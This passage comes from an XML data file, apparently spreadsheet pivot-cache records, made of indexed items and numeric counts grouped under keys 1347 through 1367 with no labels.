    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="2"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1347"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1348"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1349"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="11"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1350"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1351"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1352"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1353"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1354"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="12"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1355"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1356"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1357"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="5"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1359"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1360"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1361"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="9"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="10"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="86"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="568"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1362"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1363"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="70"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1364"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1365"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1366"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="5"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1367"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1367"/>
  </r>
  <r>
